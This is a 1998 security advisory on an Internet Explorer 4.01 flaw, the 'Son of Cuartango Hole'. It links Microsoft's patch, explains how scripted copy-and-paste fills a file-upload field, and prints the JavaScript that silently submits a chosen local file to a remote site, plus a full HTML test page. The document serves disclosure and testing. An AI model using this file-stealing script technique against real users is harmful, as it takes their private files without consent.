|
The Son of Cuartango Hole http://pages.whowhere.com/computers/cuartangojc/son1.html Affected software Microsoft Internet Explorer 4.01 Fixes Microsoft has released a fix : Microsoft Security Site http://www.microsoft.com/security/bulletins/ms98-015.asp Microsoft names the vulnerability as "Untrusted Scripted Paste". They have created a new USP patch. Technical description There is an input form field used to tranfer files from the browsing computer to a WEB site this input field is HTML coded as : <input type="file" name="filename" size="30"> Theoretically this input field can be filled only by the user by clicking a "Browse" button or typing the file name. In order to avoid a security hole, script files are not allowed to modify the value of this input field, the sentence bellow will not work : document.forms[0].filename = "C:\config.sys"; The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file name on the input field, Microsoft's old USP patch fixed this single "copy and paste" vulnerability. There is a workaround making the "paste" operation work again. The idea is : create a "textrange" object with the selection of the file input and then paste over this "textrange" object. The code below is a bit more sophisticated than the "Cuartango Hole" code : T1 is a hidden input field defined in a second form containing the file pathname to be copied to the clipboard. <body onload="getfile()"> function getfile() { document.forms[1].T1.select(); document.execCommand("copy"); document.forms[0].filename.select(); var rng = document.selection.createRange(); rng.execCommand("paste"); document.forms[0].submit(); } The result is that the file is POSTED to the malicious WEB site defined in the form action property. A similar code will also work inside an HTML formatted e-mail. The Cuartango Hole code was very similar : function getfile() { document.forms[1].T1.select(); document.execCommand("copy"); document.forms[0].filename.select(); document.execCommand("paste"); document.forms[0].submit(); } Example Exploit <html> <head> <meta name="keywords" content="son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer"> <title>Son of Cuartango Hole Test</title> <bgsound src="images/gallarda.mid" loop="-1"> </head> <body onload="getfile()"> <script language="JavaScript"> function getfile() { document.forms[0].filename.select(); // onload="getfile()" var rng = document.selection.createRange(); document.forms[1].T1.select(); document.execCommand("copy"); rng.execCommand("paste"); if(document.forms[0].filename.value == "") alert("Your browser does not have the security hole"); else alert("Security hole in browser -- " + navigator.userAgent ); } </script> <p align="center"><big><font color="#FF0000"><big><big>The Son of Cuartango Hole Test</big></big></font></big><small></p> </small> <p align="center"> </p> <small> <form enctype="multipart/form-data" method="post" action="http://www.angelfire.com/cgi-bin/bedit"> <div align="center"><center><p><strong>This is a test to verify if you are affected by the Son of Cuartango Hole</strong>.<br> <strong>If file name (/test.txt) is made visible in the box below then you are effected.</strong></p> </center></div><div align="center"><center><p> <input type="file" name="filename" size="15"></p> </center></div> </form> <form method="POST"> <input type="hidden" name="T1" value="/test.txt"><p> </p> </form> </small> <p align="center"><font size="3" color="#0000FF"><a href="http://pages.whowhere.com/computers/cuartangojc/son1.html"><strong>Back to Son Of Cuartango Hole page</strong></a></font></p> <p align="center"> <a href="mailto:cuartangojc@mx3.redestb.es">Juan Carlos García Cuartango</a></p> <p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br> </small></font></p> <p><font size="2" face="Garamond">Last update 1998 Nov 15 Año del Señor de 1998 </font></p> </body> </html>